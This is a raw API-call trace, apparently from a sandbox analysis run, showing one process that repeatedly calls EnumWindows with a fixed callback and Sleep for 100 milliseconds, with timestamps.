EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.013] Sleep (dwMilliseconds=0x64) [0220.048] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.049] Sleep (dwMilliseconds=0x64) [0220.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.068] Sleep (dwMilliseconds=0x64) [0220.087] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.122] Sleep (dwMilliseconds=0x64) [0220.134] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.135] Sleep (dwMilliseconds=0x64) [0220.162] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.163] Sleep (dwMilliseconds=0x64) [0220.194] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.195] Sleep (dwMilliseconds=0x64) [0220.273] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.274] Sleep (dwMilliseconds=0x64) [0220.313] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.314] Sleep (dwMilliseconds=0x64) [0220.335] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.335] Sleep (dwMilliseconds=0x64) [0220.351] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.351] Sleep (dwMilliseconds=0x64) [0220.407] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.408] Sleep (dwMilliseconds=0x64) [0220.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.426] Sleep (dwMilliseconds=0x64) [0220.456] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.457] Sleep (dwMilliseconds=0x64) [0220.502] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.503] Sleep (dwMilliseconds=0x64) [0220.511] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.512] Sleep (dwMilliseconds=0x64) [0220.545] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.546] Sleep (dwMilliseconds=0x64) [0220.580] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.582] Sleep (dwMilliseconds=0x64) [0220.589] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.590] Sleep (dwMilliseconds=0x64) [0220.618] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.619] Sleep (dwMilliseconds=0x64) [0220.648] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.648] Sleep (dwMilliseconds=0x64) [0220.656] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.657] Sleep (dwMilliseconds=0x64) [0220.695] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.696] Sleep (dwMilliseconds=0x64) [0220.718] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.719] Sleep (dwMilliseconds=0x64) [0220.735] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.736] Sleep (dwMilliseconds=0x64) [0220.772] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.773] Sleep (dwMilliseconds=0x64) [0220.795] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.795] Sleep (dwMilliseconds=0x64) [0220.813] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.814] Sleep (dwMilliseconds=0x64) [0220.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.850] Sleep (dwMilliseconds=0x64) [0220.869] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.870] Sleep (dwMilliseconds=0x64) [0220.887] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.888] Sleep (dwMilliseconds=0x64) [0220.923] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.924] Sleep (dwMilliseconds=0x64) [0220.933] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.934] Sleep (dwMilliseconds=0x64) [0220.964] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.965] Sleep (dwMilliseconds=0x64) [0220.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0220.993] Sleep (dwMilliseconds=0x64) [0221.001] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.002] Sleep (dwMilliseconds=0x64) [0221.039] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.052] Sleep (dwMilliseconds=0x64) [0221.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.078] Sleep (dwMilliseconds=0x64) [0221.109] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.109] Sleep (dwMilliseconds=0x64) [0221.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.116] Sleep (dwMilliseconds=0x64) [0221.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.153] Sleep (dwMilliseconds=0x64) [0221.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.179] Sleep (dwMilliseconds=0x64) [0221.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.193] Sleep (dwMilliseconds=0x64) [0221.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.231] Sleep (dwMilliseconds=0x64) [0221.248] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.248] Sleep (dwMilliseconds=0x64) [0221.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.273] Sleep (dwMilliseconds=0x64) [0221.312] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.313] Sleep (dwMilliseconds=0x64) [0221.319] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.319] Sleep (dwMilliseconds=0x64) [0221.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.358] Sleep (dwMilliseconds=0x64) [0221.424] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.425] Sleep (dwMilliseconds=0x64) [0221.501] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.503] Sleep (dwMilliseconds=0x64) [0221.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.539] Sleep (dwMilliseconds=0x64) [0221.559] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.560] Sleep (dwMilliseconds=0x64) [0221.577] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.578] Sleep (dwMilliseconds=0x64) [0221.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.614] Sleep (dwMilliseconds=0x64) [0221.622] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.623] Sleep (dwMilliseconds=0x64) [0221.653] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.654] Sleep (dwMilliseconds=0x64) [0221.685] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.686] Sleep (dwMilliseconds=0x64) [0221.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.692] Sleep (dwMilliseconds=0x64) [0221.730] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.731] Sleep (dwMilliseconds=0x64) [0221.768] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.770] Sleep (dwMilliseconds=0x64) [0221.798] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.800] Sleep (dwMilliseconds=0x64) [0221.846] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.848] Sleep (dwMilliseconds=0x64) [0221.891] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.893] Sleep (dwMilliseconds=0x64) [0221.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.895] Sleep (dwMilliseconds=0x64) [0221.932] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.969] Sleep (dwMilliseconds=0x64) [0221.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0221.972] Sleep (dwMilliseconds=0x64) [0222.014] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.015] Sleep (dwMilliseconds=0x64) [0222.053] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.054] Sleep (dwMilliseconds=0x64) [0222.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.067] Sleep (dwMilliseconds=0x64) [0222.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.095] Sleep (dwMilliseconds=0x64) [0222.133] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.134] Sleep (dwMilliseconds=0x64) [0222.162] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.162] Sleep (dwMilliseconds=0x64) [0222.165] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.165] Sleep (dwMilliseconds=0x64) [0222.180] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.181] Sleep (dwMilliseconds=0x64) [0222.217] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.218] Sleep (dwMilliseconds=0x64) [0222.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.258] Sleep (dwMilliseconds=0x64) [0222.262] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.263] Sleep (dwMilliseconds=0x64) [0222.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.302] Sleep (dwMilliseconds=0x64) [0222.342] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.343] Sleep (dwMilliseconds=0x64) [0222.423] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.425] Sleep (dwMilliseconds=0x64) [0222.462] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.463] Sleep (dwMilliseconds=0x64) [0222.499] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.500] Sleep (dwMilliseconds=0x64) [0222.517] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.518] Sleep (dwMilliseconds=0x64) [0222.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.541] Sleep (dwMilliseconds=0x64) [0222.577] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.578] Sleep (dwMilliseconds=0x64) [0222.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.591] Sleep (dwMilliseconds=0x64) [0222.616] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.617] Sleep (dwMilliseconds=0x64) [0222.653] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.654] Sleep (dwMilliseconds=0x64) [0222.669] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.670] Sleep (dwMilliseconds=0x64) [0222.693] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.694] Sleep (dwMilliseconds=0x64) [0222.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.733] Sleep (dwMilliseconds=0x64) [0222.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.754] Sleep (dwMilliseconds=0x64) [0222.772] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.773] Sleep (dwMilliseconds=0x64) [0222.809] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.810] Sleep (dwMilliseconds=0x64) [0222.836] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.837] Sleep (dwMilliseconds=0x64) [0222.853] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.854] Sleep (dwMilliseconds=0x64) [0222.903] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.905] Sleep (dwMilliseconds=0x64) [0222.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.930] Sleep (dwMilliseconds=0x64) [0222.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.945] Sleep (dwMilliseconds=0x64) [0222.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0222.985] Sleep (dwMilliseconds=0x64) [0223.016] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.018] Sleep (dwMilliseconds=0x64) [0223.024] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.025] Sleep (dwMilliseconds=0x64) [0223.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.061] Sleep (dwMilliseconds=0x64) [0223.107] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.109] Sleep (dwMilliseconds=0x64) [0223.112] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.113] Sleep (dwMilliseconds=0x64) [0223.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.154] Sleep (dwMilliseconds=0x64) [0223.201] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.204] Sleep (dwMilliseconds=0x64) [0223.215] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.217] Sleep (dwMilliseconds=0x64) [0223.244] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.246] Sleep (dwMilliseconds=0x64) [0223.287] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.288] Sleep (dwMilliseconds=0x64) [0223.296] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.297] Sleep (dwMilliseconds=0x64) [0223.329] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.330] Sleep (dwMilliseconds=0x64) [0223.367] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.368] Sleep (dwMilliseconds=0x64) [0223.466] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.469] Sleep (dwMilliseconds=0x64) [0223.513] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.553] Sleep (dwMilliseconds=0x64) [0223.572] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.573] Sleep (dwMilliseconds=0x64) [0223.593] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.594] Sleep (dwMilliseconds=0x64) [0223.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.633] Sleep (dwMilliseconds=0x64) [0223.678] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.679] Sleep (dwMilliseconds=0x64) [0223.717] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.718] Sleep (dwMilliseconds=0x64) [0223.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.755] Sleep (dwMilliseconds=0x64) [0223.761] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.762] Sleep (dwMilliseconds=0x64) [0223.793] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.794] Sleep (dwMilliseconds=0x64) [0223.924] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.972] Sleep (dwMilliseconds=0x64) [0223.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.975] Sleep (dwMilliseconds=0x64) [0223.977] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.978] Sleep (dwMilliseconds=0x64) [0223.980] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.981] Sleep (dwMilliseconds=0x64) [0223.982] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.983] Sleep (dwMilliseconds=0x64) [0223.984] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.985] Sleep (dwMilliseconds=0x64) [0223.987] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.988] Sleep (dwMilliseconds=0x64) [0223.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.991] Sleep (dwMilliseconds=0x64) [0223.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.992] Sleep (dwMilliseconds=0x64) [0223.995] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.996] Sleep (dwMilliseconds=0x64) [0223.998] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0223.999] Sleep (dwMilliseconds=0x64) [0224.001] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.002] Sleep (dwMilliseconds=0x64) [0224.003] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.004] Sleep (dwMilliseconds=0x64) [0224.006] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.007] Sleep (dwMilliseconds=0x64) [0224.008] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.009] Sleep (dwMilliseconds=0x64) [0224.010] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.011] Sleep (dwMilliseconds=0x64) [0224.012] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.013] Sleep (dwMilliseconds=0x64) [0224.014] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.015] Sleep (dwMilliseconds=0x64) [0224.016] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.017] Sleep (dwMilliseconds=0x64) [0224.018] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.019] Sleep (dwMilliseconds=0x64) [0224.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.021] Sleep (dwMilliseconds=0x64) [0224.022] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.023] Sleep (dwMilliseconds=0x64) [0224.024] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.025] Sleep (dwMilliseconds=0x64) [0224.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.027] Sleep (dwMilliseconds=0x64) [0224.029] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.030] Sleep (dwMilliseconds=0x64) [0224.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.032] Sleep (dwMilliseconds=0x64) [0224.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.034] Sleep (dwMilliseconds=0x64) [0224.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.036] Sleep (dwMilliseconds=0x64) [0224.037] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.038] Sleep (dwMilliseconds=0x64) [0224.039] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.040] Sleep (dwMilliseconds=0x64) [0224.041] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.042] Sleep (dwMilliseconds=0x64) [0224.043] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.044] Sleep (dwMilliseconds=0x64) [0224.045] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.046] Sleep (dwMilliseconds=0x64) [0224.047] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.048] Sleep (dwMilliseconds=0x64) [0224.049] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.050] Sleep (dwMilliseconds=0x64) [0224.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.052] Sleep (dwMilliseconds=0x64) [0224.054] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.054] Sleep (dwMilliseconds=0x64) [0224.056] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.056] Sleep (dwMilliseconds=0x64) [0224.058] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.058] Sleep (dwMilliseconds=0x64) [0224.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.060] Sleep (dwMilliseconds=0x64) [0224.062] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.062] Sleep (dwMilliseconds=0x64) [0224.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.066] Sleep (dwMilliseconds=0x64) [0224.068] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.069] Sleep (dwMilliseconds=0x64) [0224.071] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.071] Sleep (dwMilliseconds=0x64) [0224.073] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.073] Sleep (dwMilliseconds=0x64) [0224.075] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.075] Sleep (dwMilliseconds=0x64) [0224.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.077] Sleep (dwMilliseconds=0x64) [0224.079] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.079] Sleep (dwMilliseconds=0x64) [0224.081] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.081] Sleep (dwMilliseconds=0x64) [0224.108] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.110] Sleep (dwMilliseconds=0x64) [0224.148] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.149] Sleep (dwMilliseconds=0x64) [0224.168] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0224.169] Sleep (dwMilliseconds=0x64) [0226.025] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.026] Sleep (dwMilliseconds=0x64) [0226.146] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.147] Sleep (dwMilliseconds=0x64) [0226.180] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.181] Sleep (dwMilliseconds=0x64) [0226.190] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.191] Sleep (dwMilliseconds=0x64) [0226.228] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.230] Sleep (dwMilliseconds=0x64) [0226.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.272] Sleep (dwMilliseconds=0x64) [0226.275] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.276] Sleep (dwMilliseconds=0x64) [0226.313] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.314] Sleep (dwMilliseconds=0x64) [0226.350] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.351] Sleep (dwMilliseconds=0x64) [0226.354] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.354] Sleep (dwMilliseconds=0x64) [0226.390] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.391] Sleep (dwMilliseconds=0x64) [0226.428] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.430] Sleep (dwMilliseconds=0x64) [0226.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.438] Sleep (dwMilliseconds=0x64) [0226.470] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.471] Sleep (dwMilliseconds=0x64) [0226.508] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.509] Sleep (dwMilliseconds=0x64) [0226.526] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.527] Sleep (dwMilliseconds=0x64) [0226.548] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.550] Sleep (dwMilliseconds=0x64) [0226.596] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.597] Sleep (dwMilliseconds=0x64) [0226.619] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.620] Sleep (dwMilliseconds=0x64) [0226.635] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.636] Sleep (dwMilliseconds=0x64) [0226.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.675] Sleep (dwMilliseconds=0x64) [0226.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.708] Sleep (dwMilliseconds=0x64) [0226.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.750] Sleep (dwMilliseconds=0x64) [0226.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.785] Sleep (dwMilliseconds=0x64) [0226.789] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.789] Sleep (dwMilliseconds=0x64) [0226.826] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.827] Sleep (dwMilliseconds=0x64) [0226.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.865] Sleep (dwMilliseconds=0x64) [0226.867] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.868] Sleep (dwMilliseconds=0x64) [0226.903] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.904] Sleep (dwMilliseconds=0x64) [0226.950] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.951] Sleep (dwMilliseconds=0x64) [0226.961] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.961] Sleep (dwMilliseconds=0x64) [0226.995] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0226.996] Sleep (dwMilliseconds=0x64) [0227.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.034] Sleep (dwMilliseconds=0x64) [0227.061] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.063] Sleep (dwMilliseconds=0x64) [0227.103] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.104] Sleep (dwMilliseconds=0x64) [0227.235] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.236] Sleep (dwMilliseconds=0x64) [0227.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.252] Sleep (dwMilliseconds=0x64) [0227.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.286] Sleep (dwMilliseconds=0x64) [0227.325] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.327] Sleep (dwMilliseconds=0x64) [0227.346] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.347] Sleep (dwMilliseconds=0x64) [0227.368] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.370] Sleep (dwMilliseconds=0x64) [0227.406] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.408] Sleep (dwMilliseconds=0x64) [0227.439] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.440] Sleep (dwMilliseconds=0x64) [0227.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.458] Sleep (dwMilliseconds=0x64) [0227.498] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.499] Sleep (dwMilliseconds=0x64) [0227.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.521] Sleep (dwMilliseconds=0x64) [0227.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.537] Sleep (dwMilliseconds=0x64) [0227.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.574] Sleep (dwMilliseconds=0x64) [0227.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.604] Sleep (dwMilliseconds=0x64) [0227.615] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.653] Sleep (dwMilliseconds=0x64) [0227.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.693] Sleep (dwMilliseconds=0x64) [0227.694] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.695] Sleep (dwMilliseconds=0x64) [0227.731] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.732] Sleep (dwMilliseconds=0x64) [0227.771] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.772] Sleep (dwMilliseconds=0x64) [0227.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.785] Sleep (dwMilliseconds=0x64) [0227.811] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.813] Sleep (dwMilliseconds=0x64) [0227.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.851] Sleep (dwMilliseconds=0x64) [0227.872] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.873] Sleep (dwMilliseconds=0x64) [0227.891] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.892] Sleep (dwMilliseconds=0x64) [0227.939] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.940] Sleep (dwMilliseconds=0x64) [0227.970] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.970] Sleep (dwMilliseconds=0x64) [0227.981] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0227.982] Sleep (dwMilliseconds=0x64) [0228.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.021] Sleep (dwMilliseconds=0x64) [0228.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.061] Sleep (dwMilliseconds=0x64) [0228.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.104] Sleep (dwMilliseconds=0x64) [0228.169] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.171] Sleep (dwMilliseconds=0x64) 